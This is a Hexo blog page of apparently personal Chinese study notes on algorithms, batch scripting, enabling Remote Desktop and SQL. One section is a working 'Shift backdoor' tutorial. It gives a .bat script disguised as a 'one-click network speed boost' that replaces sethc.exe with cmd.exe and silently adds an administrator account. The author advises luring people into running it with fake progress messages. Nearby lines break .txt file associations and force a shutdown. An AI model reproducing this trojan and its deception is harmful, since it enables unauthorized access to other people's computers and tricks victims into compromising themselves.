<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;junlin623&#x2F;articles&#x2F;17125417.html  title: ‘2023-2-15-junlin623’date: 2023-02-16 08:45:00        如果一颗树中已经存在了一些边（必选），再进行克鲁斯卡尔算法同样可以得到最小生成树   上图中并不是最小生成树的问题，因为可以有负数，那么没选一条负权边都会使得边权">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2023/05/18/2023-2-15-junlin623/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;junlin623&#x2F;articles&#x2F;17125417.html  title: ‘2023-2-15-junlin623’date: 2023-02-16 08:45:00        如果一颗树中已经存在了一些边（必选），再进行克鲁斯卡尔算法同样可以得到最小生成树   上图中并不是最小生成树的问题，因为可以有负数，那么没选一条负权边都会使得边权">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215084918219.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215093129644.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215100546977.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215144027669.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152207441.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152248893.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152632838.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152925728.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215154706264.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215155249847.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215160124681.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215161204974.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215185731398.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215185807163.png">
<meta property="og:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215190438212.png">
<meta property="article:published_time" content="2023-05-17T16:09:35.059Z">
<meta property="article:modified_time" content="2023-05-17T11:57:00.805Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215084918219.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-2023-2-15-junlin623" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2023/05/18/2023-2-15-junlin623/" class="article-date">
  <time class="dt-published" datetime="2023-05-17T16:09:35.059Z" itemprop="datePublished">2023-05-18</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/junlin623/articles/17125417.html">https://www.cnblogs.com/junlin623/articles/17125417.html</a></p>
<hr>
<p>title: ‘2023-2-15-junlin623’<br>date: 2023-02-16 08:45:00</p>
<hr>
<meta name = "referrer" content = "no-referrer" />



<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215084918219.png" alt="image-20230215084918219"></p>
<hr>
<p>如果一颗树中已经存在了一些边（必选），再进行克鲁斯卡尔算法同样可以得到最小生成树</p>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215093129644.png" alt="image-20230215093129644"></p>
<p>上图中并不是最小生成树的问题，因为可以有负数，那么没选一条负权边都会使得边权和降低，极端情况是所有边都是负数，那全部选择肯定边权和最小</p>
<p>如果要求解的话肯定是要把所有的负权边选上，然后考虑正权边，直至n个点连通</p>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215100546977.png" alt="image-20230215100546977"></p>
<p>用clock操作可以判断程序运行过程中一旦超时就输出当前结果并退出，但是clock()这个函数特别慢，应该尽量减少其执行次数（也就是执行多少次时候再执行clock()函数）</p>
<hr>
<p>在windows中浏览文件的时候先点上一个文件，然后点击想要查找的文件名的首字母就会自动跳转到对应字母的位置：</p>
<p>按下 s 键跳转：	</p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215144027669.png" alt="image-20230215144027669"></p>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152207441.png" alt="image-20230215152207441"></p>
<p>原生架构一般在企业生产环境中使用</p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152248893.png" alt="image-20230215152248893"></p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152632838.png" alt="image-20230215152632838"></p>
<p>Vmware操作系统，基于Linux开发，一般按照cpu进行收费</p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215152925728.png" alt="image-20230215152925728"></p>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215154706264.png" alt="image-20230215154706264"></p>
<ul>
<li><p>方法一：这个其他电脑拷贝一个，替换掉（我问了三个朋友，都没这个文件，让后我就用方法二了，binggo,成功）</p>
</li>
<li><p>方法二：删除文件WindowsUpdate.admx这里会提示没权限，自行百度获取权限</p>
</li>
</ul>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215155249847.png" alt="image-20230215155249847"></p>
<p>bat脚本中定义变量等号两端不要出现空格:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> a = 10  <span class="comment"># 错误</span></span><br><span class="line"><span class="built_in">set</span> a=10    <span class="comment"># 正确</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">dir</span> | more   <span class="comment"># 可以分页查看</span></span><br></pre></td></tr></table></figure>

<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215160124681.png" alt="image-20230215160124681"></p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215161204974.png" alt="image-20230215161204974"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fsutil file createnew c:\system.ini 4096       <span class="comment"># 在c盘创建文件并指定文件大小为4096字节（文件中填满空格），如果用这个命令声生成一个特别大的文件并隐藏，这就非常难发现</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 修改关联</span></span><br><span class="line">assoc .txt=exefile         <span class="comment"># 修改打开txt文件的程序 使其无法打开</span></span><br><span class="line">assoc .txt=txtfile         <span class="comment"># 恢复</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 强制定时关机, -c后面是提示信息</span></span><br><span class="line">shutdown -s -f -t 100 -c <span class="string">&quot;haah&quot;</span></span><br></pre></td></tr></table></figure>

<p>windows在开机过程中sam文件是禁止被访问的</p>
<hr>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215185731398.png" alt="image-20230215185731398"></p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215185807163.png" alt="image-20230215185807163"></p>
<p><img src="D:/%E6%97%A5%E5%B8%B8%E6%89%80%E5%AD%A6/Picture/image-20230215190438212.png" alt="image-20230215190438212"></p>
<hr>
<h3 id="gt-nul-2-gt-nul-gt-nul-2-gt-nul-区别"><a href="#gt-nul-2-gt-nul-gt-nul-2-gt-nul-区别" class="headerlink" title="&gt;nul 2&gt;nul &gt;nul 2&gt;nul 区别:"></a>&gt;nul 2&gt;nul &gt;nul 2&gt;nul 区别:</h3><blockquote>
<p>&gt;nul       即“1&gt;nul”；屏蔽操作成功显示的信息，但是出错还是会显示</p>
<p> 2&gt;nul      是屏蔽操作失败显示的信息，如果成功依旧显示。</p>
<p> &gt;nul 2&gt;nul  全部都屏蔽，成功的还是失败的都不显示</p>
</blockquote>
<hr>
<h3 id="一个Shift的后门程序，可以让你可以进入你不知道密码的电脑"><a href="#一个Shift的后门程序，可以让你可以进入你不知道密码的电脑" class="headerlink" title="一个Shift的后门程序，可以让你可以进入你不知道密码的电脑"></a>一个Shift的后门程序，可以让你可以进入你不知道密码的电脑</h3><p>1.前提</p>
<p>你可以在平时亲身接触状态电脑，哪怕是在电脑主人不在的时候（虽然主人不在，或者关机了，进入电脑是要密码的）。</p>
<p>2.原理</p>
<p>利用电脑连续按5次Shift会触发粘滞键，它会运行c:\winows\system32\setchx.exe</p>
<p>3.Shift后门程序编写</p>
<p>将下面的内容保存成.bat后缀的文件，文件名你可以自己取，取的吸引人一点，他们就会点了，你懂的！</p>
<p>为了让别人不知道你这个程序在处理什么，你可以在里面写一些让他以为在做正常的东西的文字。</p>
<p>文件名：一键提升网速.bat</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> 开始分析网络......</span><br><span class="line">ren c:\windows\system32\sethc.exe c:\windows\system32\sethc_backup.exe</span><br><span class="line">ren c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</span><br><span class="line"><span class="built_in">echo</span> 你的网速太慢了！</span><br><span class="line">net user admin 123456 /add &amp;&amp; net localgroup administrators admin /add</span><br><span class="line"><span class="built_in">echo</span> 你把我这个文件删了吧!</span><br></pre></td></tr></table></figure>

<p>其中里面有句语法是这样的：</p>
<p>net user 你要添加的用户名 密码 &#x2F;add &amp;&amp; net localgroup administrators 你要添加的用户名 &#x2F;add</p>
<p>所以上面的程序他一旦执行，那么就会创建一个叫 admin 的用户 密码是 123456<br>那么如果我想先植入，以后我自己去创建用户呢？<br>那很简单，把最后一句给去掉，到时候，窗口弹出来了之后你再手动输入那句命令。</p>
<hr>
<h3 id="bat里面-echo-后面加一点-有什么用？"><a href="#bat里面-echo-后面加一点-有什么用？" class="headerlink" title="bat里面 echo. 后面加一点 有什么用？"></a>bat里面 echo. 后面加一点 有什么用？</h3><p>​	输出空行，即相当于输入一个回车 格式：ECHO．值得注意的是<a target="_blank" rel="noopener" href="https://zhidao.baidu.com/search?word=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&fr=iknow_pc_qb_highlight">命令行</a>中的“．”要紧跟在ECHO后面中间不能有空格，否则“．”将被当作提示信息输出到屏幕。另外“．”可以用，：；”／[]＋等任一符号替代。</p>
<hr>
<h3 id="cmd命令行开启windows远程桌面"><a href="#cmd命令行开启windows远程桌面" class="headerlink" title="cmd命令行开启windows远程桌面:"></a>cmd命令行开启windows远程桌面:</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#设置远程桌面端口</span></span><br><span class="line">reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f</span><br><span class="line"><span class="comment">#开启远程桌面</span></span><br><span class="line">wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1</span><br><span class="line"><span class="comment">#检查端口状态</span></span><br><span class="line">netstat -an|find “3389”</span><br><span class="line"><span class="comment">#关闭远程桌面</span></span><br><span class="line">wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 0</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 查询选修了课程的学生人数</span><br><span class="line"><span class="keyword">SELECT</span> <span class="built_in">COUNT</span>(<span class="keyword">DISTINCT</span> Sno)</span><br><span class="line"><span class="keyword">FROM</span> SC;</span><br><span class="line"># 学生每选秀一门课，在SC中都有一条相应的记录，一个学生要选修多门课程，为避免重复计算人数，必须在COUNT函数中用DISTINCTduan</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/c630210991/article/details/84107592">模式与数据库与表的关系</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/05/18/2023-2-15-junlin623/" data-id="clhrwf8ii0001eksz5iveb0ae" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/05/18/ABC242%20ABCTransform-junlin623/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2023/05/18/1/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">May 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/05/18/%E7%9B%B4%E8%BF%9E%E8%B7%AF%E7%94%B1%E8%A1%A8%E9%A1%B9%E8%A7%A3%E6%9E%90-junlin623/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/18/%E6%95%B4%E6%95%B0%E5%88%92%E5%88%86%E9%97%AE%E9%A2%98-junlin623/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/18/%E5%8E%9F%E7%94%9F%E6%96%B9%E5%BC%8F%E9%83%A8%E7%BD%B2JavaWeb%E9%A1%B9%E7%9B%AE%E5%88%B0%E8%BF%9C%E7%A8%8B%E4%B8%BB%E6%9C%BA-junlin623/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/18/%E5%8E%9F%E6%9D%A5%E6%98%AFvmware-hostd%E7%A8%8B%E5%BA%8F%E5%8D%A0%E7%94%A8%E4%BA%86443%E7%AB%AF%E5%8F%A3-junlin623/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/18/%E5%AD%A6%E7%94%9F%E5%8F%AF%E4%BB%A5%E7%99%BD%E5%AB%96%E9%98%BF%E9%87%8C%E4%BA%91ECS%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%8D%8A%E5%B9%B4~~-junlin623/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>